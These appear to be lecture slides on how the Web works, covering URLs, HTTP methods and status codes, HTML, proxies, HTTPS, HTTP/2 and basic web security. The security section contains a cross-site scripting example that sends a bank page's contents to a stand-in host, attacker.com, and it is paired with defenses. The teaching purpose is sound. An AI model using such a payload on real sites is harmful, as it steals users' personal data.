The Web seems an “obvious” extension
of the Internet.
What is so special about
the invention of the Web?
This flyer predates the Web’s boom.
What is missing?
The Web actually consists of
3 separate—but connected—inventions.
A URL uniquely identifies a resource.
HTTP allows us to retrieve a representation
of a resource through a URL.
HyperText Transfer Protocol
An HTML document can represent a resource,
and link to other resources through their URL.
HyperText Markup Language
A Web URL uniquely identifies and locates
a resource anywhere in the universe.
A string is a unique identifier if
at most one entity corresponds to it.
A national number uniquely identifies a person,
but does not allow locating him or her.
A string is a unique locator if
at most one location corresponds to it.
A street address uniquely identifies a location,
but does not identify a specific person.
A (well-chosen) URL combines
identification and location.
http://en.wikipedia.org/wiki/Susan_Wojcicki
This URL identifies the current Wikipedia article
about Susan Wojcicki.
It does not (also) identify Susan herself.
Otherwise, it wouldn’t be unique anymore.
At the same time, this URL allows us to locate
the Wikipedia article about Susan Wojcicki.
Again, not Susan herself—nor anything else.
Deceptively simple, the URL is probably
the most revolutionary part of the Web.
The flyer we saw earlier shows
what a lack of unique location means.
publisher-specific download instructions
machine-dependent execution
Unique identification partially existed,
but not yet globally for documents.
e-mail addresses and server names are global
document names are server-specific
The generic URL syntax
extends beyond the Web.
<scheme>:<scheme-specific-part>
The uniform structure of an HTTP URL
includes the following parts.
http://<host>/<path>?<search>#<fragment>
hostname
identifies the machine
path
identifies the resource within the machine
search
optionally refines the resource
fragment
optionally identifies a part of the resource
The uniform structure of an HTTP URL
includes the following parts.
http://en.wikipedia.org/wiki/Susan_Wojcicki#Career
hostname
the machine is en.wikipedia.org
path
the resource is /wiki/Susan_Wojcicki
search
not present
fragment
the part of the resource is Career
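As an aside, this breakdown can be reproduced with the standard URL API available in browsers and Node.js; a minimal sketch:
const url = new URL('http://en.wikipedia.org/wiki/Susan_Wojcicki#Career');
console.log(url.hostname); // "en.wikipedia.org"
console.log(url.pathname); // "/wiki/Susan_Wojcicki"
console.log(url.search);   // "" (no search part present)
console.log(url.hash);     // "#Career"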
An HTTP URL provides the instructions
to obtain a representation of the resource.
http://<host>/<path>?<search>#<fragment>
The client looks up one of the host’s IP addresses.
The client uses DNS for this.
The client requests /<path>?<search>.
The server generates a response in a server-specific way.
The client finds #<fragment>.
Fragments are defined by the representation format.
An HTTP URL provides the instructions
to obtain a representation of the resource.
http://en.wikipedia.org/wiki/Susan_Wojcicki#Career
The client looks up an IP address of en.wikipedia.org .
One such address is 91.198.174.192 .
The client requests /wiki/Susan_Wojcicki .
The server generates the corresponding Wikipedia article.
The client finds #Career .
This corresponds to a header in the HTML document.
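Most HTTP libraries perform these steps behind a single call; a minimal sketch using the fetch API (note that the fragment is never sent to the server):
// Resolve the host, connect, and request the path
const response = await fetch('http://en.wikipedia.org/wiki/Susan_Wojcicki');
const html = await response.text();
// The #Career fragment is handled locally by the client,
// for example by scrolling to the matching header in the HTML document.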
The URL became part of a family
of technologies related to identification.
URL – Uniform Resource Locator (RFC 1738)
unique identification and location of resources
mailto:ruben.verborgh@ugent.be
URN – Uniform Resource Name (RFC 2141)
location-independent resource identifier
urn:isbn:1783303018
URI – Uniform Resource Identifier (RFC 3986)
umbrella term covering URLs and URNs
The broadest family is IRI,
which supports non-ASCII characters.
Not all characters are allowed in a URI.
IRI – Internationalized Resource Identifier (RFC 3987)
Non-ASCII chars don’t need to be encoded.
Chars with other meaning still need encoding.
http://🏹.to/🗽🕐
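As a small illustration using JavaScript’s built-in functions: non-ASCII characters of an IRI can be percent-encoded to obtain a plain URI, while characters with special meaning always need encoding.
console.log(encodeURIComponent('🏹'));  // "%F0%9F%8F%B9" (UTF-8 bytes, percent-encoded)
console.log(encodeURIComponent('a#b')); // "a%23b" ("#" would otherwise start a fragment)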
HTTP is a protocol to transfer representations
from a server to a client.
HTTP standardizes how clients send a request
for a representation
of a resource through its URL.
HTTP standardizes how servers reply with a response
that can contain a representation.
The most widely used version
is HTTP/2 .
After resolving the server’s IP address,
the client can send an HTTP request.
To obtain http://en.wikipedia.org/wiki/Susan_Wojcicki ,
the client connects to 91.198.174.192 on TCP port 80,
and sends this request:
GET /wiki/Susan_Wojcicki HTTP/1.1
Host: en.wikipedia.org
User-Agent: MyBrowser/1.0
Accept: text/html
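For illustration only, the exact bytes above can be written to a TCP socket; a sketch with Node.js’s net module (the live server may answer with a redirect to HTTPS):
const net = require('net');

// Connect to the host on TCP port 80 (the hostname is resolved via DNS)
const socket = net.connect(80, 'en.wikipedia.org', () => {
  socket.write(
    'GET /wiki/Susan_Wojcicki HTTP/1.1\r\n' +
    'Host: en.wikipedia.org\r\n' +
    'User-Agent: MyBrowser/1.0\r\n' +
    'Accept: text/html\r\n' +
    'Connection: close\r\n' +
    '\r\n');
});
// Print the raw response: status line, headers, and body
socket.on('data', chunk => process.stdout.write(chunk));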
HTTP has a limited number of methods.
The following 5 are widely known.
GET
transfer a representation
HEAD
transfer only status and headers
POST
perform a resource-specific operation
PUT
replace all representations
DELETE
remove all representations
An HTTP method is safe
if it is read-only.
The client does not request
a state change of the resource.
The server can still change something,
but the client is not “accountable”.
Safe methods include GET and HEAD.
Automated clients cannot cause harm with these.
Servers not respecting this contract act dangerously.
An HTTP method is idempotent
if repetitions don’t alter the outcome.
The client can execute an idempotent request
1 or more times; the result remains the same.
If a request (maybe) failed, just try it again.
Idempotent methods include all safe methods,
as well as PUT and DELETE.
Deleting something multiple times
is the same as deleting it once.
Repeating other methods might be undesired.
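A sketch of why this matters for clients, with a made-up resource URL: a failed PUT can simply be retried, because repeating it leads to the same end state (a real client would cap the number of retries).
async function savePreferences(preferences) {
  try {
    // PUT replaces all representations of the (hypothetical) resource
    return await fetch('https://example.org/users/42/preferences', {
      method: 'PUT',
      headers: { 'Content-Type': 'application/json' },
      body: JSON.stringify(preferences),
    });
  } catch (error) {
    // The request may or may not have reached the server;
    // because PUT is idempotent, trying again cannot alter the outcome.
    return savePreferences(preferences);
  }
}
// Retrying a POST this way could repeat a non-idempotent operation.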
Clients send the hostname,
so one server can host multiple websites.
Although the client resolves it to an IP address,
the hostname is still sent to the server.
There is no one-to-one mapping
between server IP addresses and domains.
One website can be hosted by multiple servers.
Multiple DNS entries exist for a hostname.
One server can host multiple websites.
The Host header tells the server which one to pick.
When a server receives a request,
it generates a response.
The response starts with a status line.
The response can contain header fields.
The response can optionally contain a body.
depending on status code
contains the actual document contents
When a server receives a request,
it generates a response.
In response to our previous request:
HTTP/1.1 200 OK
Date: Wed, 18 Feb 2016 09:30:46 GMT
Content-Type: text/html; charset=UTF-8
Last-Modified: Sun, 24 Jan 2016 18:26:27 GMT
<!DOCTYPE html>
<html lang="en" dir="ltr" class="client-nojs">
…
HTTP has 5 categories of status codes
to indicate how the request was handled.
100–199
info – the client may continue
200–299
success – request understood & accepted
300–399
redirection – further action is needed
400–499
client error – the request cannot be fulfilled
500–599
server error – the server failed to fulfill
A couple of these status codes
are very commonly encountered.
200
OK
(“default”)
301
Moved Permanently
404
Not Found
500
Internal Server Error
HTML is a markup language that
captures the structure of documents.
HTML divides a document into elements ,
which are indicated by opening and closing tags .
Tags begin with “<” and end with “>”.
(Regular) closing tags begin with “</”.
Self-closing tags end with “/>”.
Opening tags can have key/value attributes.
The key name is followed by “=” and its value.
The value is usually surrounded by (single/double) quotes.
The HTML specification restricts
what elements can be used and where.
A few dozen tags
exist for different element types.
They have rules for what attributes they can have,
and what child elements they can/should have.
There are three main parts:
<html>
for the entire document
<head>
for document metadata
<body>
for document contents
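A minimal document illustrating these three parts:
<!DOCTYPE html>
<html lang="en">
  <head>
    <title>Document metadata goes here</title>
  </head>
  <body>
    <p>Document contents go here.</p>
  </body>
</html>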
HTML documents can embed or use
other media documents.
Embed images, audio, and video.
Use style sheets, fonts,
and scripts.
<link rel="stylesheet">
<script>
Embed other pages (instead of linking to them).
HTML is intended for markup ,
not for makeup .
HTML elements focus on structure…
<h2>The <em>new</em> section</h2>
…not on aesthetics.
<font size="5">
<b>The <i>new</i> section</b>
</font><br/>
Makeup-only elements were removed from HTML5.
The Web supports an immense variety
of different clients.
All clients need to support
a couple of core technologies.
networking technologies
the HTTP protocol
many libraries exist
often combined with networking support
one or more representation formats
not necessarily (only) HTML
Browsers offer an interactive environment
for general-purpose website consumption.
They render HTML elements as interactive controls.
They typically support styles, media, and scripts.
Standards ensure consistency (mostly).
The main differences are features and preferences.
operating system
performance
extensions
Web applications perform HTTP requests
using browser scripting functionality.
A script on a webpage can make HTTP requests.
The server typically returns JSON or XML responses,
which the script then transforms.
Alternatively, the server could return HTML,
for instance, to update parts of the page.
Scripts can be triggered automatically
or through user actions.
clicking a button or link
pressing a key (autocompletion)
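A minimal sketch of such a script; the element IDs and the /api/search URL are invented for illustration:
// Triggered by a user action: clicking the (hypothetical) search button
document.getElementById('search-button').addEventListener('click', async () => {
  // The script performs an HTTP request in the background
  const response = await fetch('/api/search?query=guitars');
  const results = await response.json();
  // …and transforms the JSON response into an update of the page
  document.getElementById('results').textContent =
    results.map(result => result.title).join(', ');
});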
Desktop and mobile applications
can similarly create HTTP requests.
They use their own infrastructure,
as they don’t have the browser’s.
In particular, they usually don’t set cookies.
They typically request JSON (or XML),
but HTML is not uncommon.
HTML can be used to render partial views.
Is there a real need then for a native app?
Crawlers process and/or index webpages,
and follow links to others.
Crawlers extract, process, and index text contents.
They also analyze (some) structured annotations.
Using links, they discover other pages.
The HTTP protocol does not attach
meaning to URL paths and query strings.
Even though you might attach meaning to a URL like
https://example.org/products/guitars.html?brand=gibson,
such an interpretation is not specified.
In particular, slashes do not necessarily indicate folders;
a dot does not necessarily signal an extension.
The server might just have used this URL instead:
https://example.org/products-guitars?html%2Fbrand.gibson
and it might very well point to an image.
Web servers exist in many kinds and
have many possible implementations.
A static file server maps HTTP URLs
to internal file URLs.
A config file usually assigns a root folder per domain.
https://example.org/images/products/guitar.jpg
could map to /var/www/example.org/images/products/guitar.jpg
Folders map to possible index files.
https://example.org/images/products/
could map to /var/www/example.org/images/products/index.html
Custom permissions and rules can be set.
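A simplified sketch of this mapping in Node.js, assuming the /var/www/example.org root folder from the example; real static servers add security checks, content types, caching, and more:
const http = require('http');
const fs = require('fs');
const path = require('path');

const root = '/var/www/example.org';

http.createServer((request, response) => {
  // Map the HTTP URL path to an internal file path under the root folder
  const { pathname } = new URL(request.url, 'http://example.org');
  let filePath = path.join(root, pathname);
  // Folders map to a possible index file
  if (pathname.endsWith('/')) filePath = path.join(filePath, 'index.html');
  fs.readFile(filePath, (error, contents) => {
    if (error) {
      response.writeHead(404, { 'Content-Type': 'text/plain' });
      response.end('Not Found');
    } else {
      response.writeHead(200);
      response.end(contents);
    }
  });
}).listen(8080); // port 80 typically requires elevated privileges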
An application server uses server-side code
to generate pages on demand.
The request is parsed by an application framework,
which exposes the URL, method, and headers.
Implementors can react to specific URLs or patterns,
typically generating responses using templates.
Many languages and frameworks exist.
languages:
Java
PHP
JavaScript
Ruby
C#
…
frameworks:
Spring MVC
Ruby on Rails
ASP.NET
…
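A bare-bones sketch of this pattern in Node.js without a framework; the URL pattern and inline template are invented for illustration:
const http = require('http');

http.createServer((request, response) => {
  const { pathname } = new URL(request.url, 'http://example.org');
  // React to a specific URL pattern
  const match = pathname.match(/^\/products\/(\w+)$/);
  if (match) {
    // Generate the response on demand, here with an inline template
    response.writeHead(200, { 'Content-Type': 'text/html; charset=UTF-8' });
    response.end(`<h1>Product category: ${match[1]}</h1>`);
  } else {
    response.writeHead(404, { 'Content-Type': 'text/plain' });
    response.end('Not Found');
  }
}).listen(3000);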
Several intermediaries may exist
between a client and a server.
In contrast to many other protocols,
HTTP enables transparent intermediaries.
This is not as easy with other protocols.
For example, let’s assume Java RMI.
remoteObject.getMessage(234);
remoteObject.getMessage(234);
remoteObject.deleteMessage(234);
If a proxy server is inserted before the remote server,
may it cache the result of getMessage
?
If so, how long?
HTTP can be transparent because of
its standardized uniform interface.
Caching is possible with headers
such as Cache-Control and ETag.
Cache-Control: max-age=3600
ETag: UniqueHash456
The intermediary fetches the requested item
and keeps it in cache until it expires.
Repeated requests for the item
are served from cache.
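A sketch of a server attaching these headers in Node.js; the ETag value is a stand-in, and real servers derive it from the representation:
const http = require('http');

http.createServer((request, response) => {
  const headers = {
    'Content-Type': 'text/html; charset=UTF-8',
    'Cache-Control': 'max-age=3600',  // may be cached for one hour
    'ETag': '"UniqueHash456"',        // identifies this version of the representation
  };
  // A client or intermediary that already holds this version
  // gets 304 Not Modified instead of the full body
  if (request.headers['if-none-match'] === '"UniqueHash456"') {
    response.writeHead(304, headers);
    response.end();
  } else {
    response.writeHead(200, headers);
    response.end('<!DOCTYPE html><html>…</html>');
  }
}).listen(3000);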
The standardized method semantics
are crucial to make caching work.
Repeated GET requests can be cached,
because GET is safe.
The client did not ask for changes,
so the server should perform none.
Since nothing changes, we can bypass the server.
If POST or PUT are used on a resource,
a subsequent GET must not be read from cache.
POST and PUT are not safe and may change things.
(Repeated identical PUT requests can be ignored though.)
Depending on their position in the network,
proxies are forward or reverse .
(forward) proxy
in the network of the client
typically used for caching
possibly for security/anonymity purposes
reverse proxy
in the network of the server
typically used for caching
also for routing, hiding/abstracting remote architecture
A device only has one TCP port 80.
A reverse proxy lets it run many servers.
What if we need to serve static and dynamic files?
What if we want to combine application servers?
Only one application can listen to a given TCP port.
Configure servers to run on internal ports
(such as 3000, 4000, 5000) instead of port 80.
Run a reverse proxy (NGINX, Apache, …) on port 80,
which dispatches requests to the other servers.
Route requests based on the Host header and/or path.
The proxy interfaces with app servers
through other, non-public TCP ports.
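A conceptual sketch of such a reverse proxy in Node.js; the hostnames and internal ports are assumptions, and production setups would rather configure NGINX or Apache:
const http = require('http');

// Map public hostnames to internal, non-public ports
const backends = {
  'static.example.org': 3000,
  'app.example.org': 4000,
};

http.createServer((request, response) => {
  // Route based on the Host header
  const port = backends[request.headers.host] || 3000;
  // Forward the request to the chosen application server
  const upstream = http.request(
    { host: 'localhost', port, path: request.url,
      method: request.method, headers: request.headers },
    upstreamResponse => {
      response.writeHead(upstreamResponse.statusCode, upstreamResponse.headers);
      upstreamResponse.pipe(response);
    });
  request.pipe(upstream);
}).listen(80);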
Caching can happen virtually anywhere—
and we don’t always know.
The notion of “client” and “server”
is relative to the interaction.
HTTP nodes send plaintext over TCP,
which means intermediaries can read it.
The privacy of your requests is not guaranteed.
The privacy of server responses is not guaranteed.
The integrity of server responses is not guaranteed.
The Web needs to be a safe
and trusted environment for all.
HTTP poses a major threat
for sensitive applications.
banking
payment
medical records
webmail
…
It’s hard to define what is sensitive .
Can others see what Wikipedia articles you read?
HTTPS is a secure extension
of the HTTP protocol.
HTTPS can be applied in
different parts of the network.
Consider the common use case in which
an application server lives behind a reverse proxy .
Only the proxy could use HTTPS.
Typically, server and proxy operate in a trusted network.
Client–proxy communications are secured.
The server and the proxy could use HTTPS.
These are two different encrypted communications.
No proxy can sit “in between” an encrypted communication.
Setting up HTTPS involves requesting,
installing, and maintaining a certificate.
Request an SSL certificate from a certificate authority.
This certificate is valid for one or more hostnames.
Let's Encrypt provides free certificates for all.
Configure your Web server with the certificate.
private key stored safely
public key shared with clients
When the certificate expires, request a new one.
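As an example, a Node.js server configured with such a certificate could look like this; the file paths are placeholders:
const https = require('https');
const fs = require('fs');

https.createServer({
  key: fs.readFileSync('/etc/ssl/private/example.org.key'), // private key, stored safely
  cert: fs.readFileSync('/etc/ssl/certs/example.org.crt'),  // certificate, shared with clients
}, (request, response) => {
  response.writeHead(200, { 'Content-Type': 'text/plain' });
  response.end('Served over HTTPS\n');
}).listen(443);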
HTTPS URLs are different,
so clients know what protocol to use.
HTTP URLs start with http:
HTTPS URLs start with https:
After HTTPS has been configured,
server admins typically set up redirects.
Never break existing URLs!
The connection between two URLs differing only
in http/https is not universally defined.
They could be different things.
Most browsers indicate HTTPS in the address bar.
Several browser vendors campaigned
to have an all-HTTPS Web.
The Web has been pushing HTTP’s limits,
so an update was due.
The Web has different demands nowadays
than those initially envisaged.
HTTP/2 is an update of the HTTP protocol
that addresses a couple of key bottlenecks.
This section is based on http2 explained
by Daniel Stenberg, creator of curl.
Webpages consist of more and more items
that increasingly become larger.
The HTTP Archive
saw median total page transfer sizes increase
from 0.5MB in 2010 to 2MB in 2022.
The median page consists of 69 objects.
Several limitations of HTTP have
a negative impact on page load times.
Many websites use(d) workarounds
to circumvent HTTP’s limitations.
inlining
Embed scripts, images, and/or styles
inside HTML documents instead of linking them
to reduce the number of items.
concatenation
Combine several scripts, images, or styles
into a single file.
sharding
Distribute resources across different domains
to bypass connection restrictions.
HTTP/2 set out a couple of
important goals for improvement.
Reduce sensitivity to latency.
Eliminate the need for multiple connections.
Fix HTTP pipelining and head-of-line blocking.
Maintain interfaces, content, and URLs.
Remain backward compatible with HTTP/1.1 clients.
HTTP/2 is a binary protocol that sends
frames over multiplexed streams.
Switching to binary makes framing easier.
10 types of frames
HEADERS
frame for HTTP headers
DATA
for request and response payloads
Multiplexing ensures objects don’t block each other.
Frames from many streams flow over the same connection.
Additional compression reduces overhead.
HTTP’s stateless nature implies repetition.
HTTP/2 always goes over TLS in practice,
even though the standard also allows plain TCP.
With plain TCP on port 80, clients would
need to upgrade from HTTP/1.x to HTTP/2.
overhead necessary for backward compatibility
With TLS, Application-Layer Protocol Negotiation
is embedded within the TLS handshake.
no protocol selection latency
Firefox and Chrome only support HTTP/2 over TLS.
https: everywhere in the future
Protocol-level security is insufficient
to provide application-level security.
Protocol-level security only guarantees privacy and integrity
from one endpoint to another.
The Web evolved from a document system
to a distributed application platform.
Applications themselves also need
mechanisms to secure information.
With code injection, clients send input
designed to execute on the server.
attack
executable code passed in a URL or POST body parameter
cause
improper input validation by the server
defense
never trust raw client input
validate input ranges
escape values before passing to scripts
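A sketch of such server-side validation; the route, parameter, and lookUpMessage helper are hypothetical:
// Hypothetical handler for GET /messages?id=…
function handleGetMessage(request, response, query) {
  const id = Number(query.get('id'));
  // Validate the input range: accept only positive integers
  if (!Number.isInteger(id) || id < 1) {
    response.writeHead(400, { 'Content-Type': 'text/plain' });
    return response.end('Invalid message id');
  }
  // Pass only the validated value on, never the raw client input
  return lookUpMessage(id, response); // lookUpMessage: hypothetical data-layer call
}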
Client-side validation only offers usability;
servers always need to (re-)validate.
Example: a client-side form with a role dropdown
offering admin, user, and developer.
Ways to bypass
change the HTML at runtime
construct the HTTP request in another way
Client-side-only validation in the real world
With Cross-Site Scripting (XSS), a client-side script
steals information from a webpage.
attack
trick another site into executing code in its own space,
exposing or changing user data
causes
improper input validation
trusting third-party content
social engineering
defense
validate input
add token field on forms
Injecting JavaScript in pages
can steal a user’s personal data.
The original page echoes “assets” in its contents
https://mybank.com/onlinebanking/?search=assets
Attack code
(xhr = new XMLHttpRequest()).open('GET',
'https://attacker.com/?data=' + document.body.innerHTML);
xhr.send(null);
A modified URL echoes the attack code in its contents
https://mybank.com/onlinebanking/?search=%3Cscript%3E(xhr%20%3D%20new
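The corresponding defense is to validate and escape user-controlled values before echoing them into the page; a minimal sketch, where escapeHtml is an illustrative helper rather than a built-in function:
// Replace characters that carry meaning in HTML by character references
function escapeHtml(value) {
  return value.replace(/&/g, '&amp;')
              .replace(/</g, '&lt;')
              .replace(/>/g, '&gt;')
              .replace(/"/g, '&quot;')
              .replace(/'/g, '&#39;');
}

const searchTerm = '<script>…</script>'; // attacker-controlled input (example)
// The search term is now rendered as text instead of being executed
const page = `<p>Results for ${escapeHtml(searchTerm)}</p>`;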
With cross-origin access, a page requests
third-party resources through JavaScript.
attack
request resources from another site with JavaScript and read their contents
causes
the existence of XMLHttpRequest
being logged in on another website
defense
browsers block cross-origin requests by default
Cross-origin requests are a problem
within browsers only.
Nothing happens when any other script or app
requests https://mybank.com/onlinebanking/.
You are not logged in—there are no cookies.
When the browser requests that page,
the page might contain personal information.
You might be logged in—browsers maintain cookies.
As a result, browsers block cross-origin requests.
an origin more or less corresponds to a domain
Activate CORS to enable access to Web APIs
from within other browser-based Web applications.
The browser adds an Origin header to requests.
If the server allows requests from that origin,
it adds Access-Control-Allow-Origin.
Access-Control-Allow-Origin: https://my.site
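A sketch of a Web API enabling CORS for that one origin, using plain Node.js:
const http = require('http');

http.createServer((request, response) => {
  // Only scripts running on https://my.site may read this response in a browser
  if (request.headers.origin === 'https://my.site') {
    response.setHeader('Access-Control-Allow-Origin', 'https://my.site');
  }
  response.setHeader('Content-Type', 'application/json');
  response.end(JSON.stringify({ message: 'Hello from a Web API' }));
}).listen(3000);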
Users spend most of their time on other sites.
This means that users prefer your site to work the same way as all the other sites they already know.
Jakob Nielsen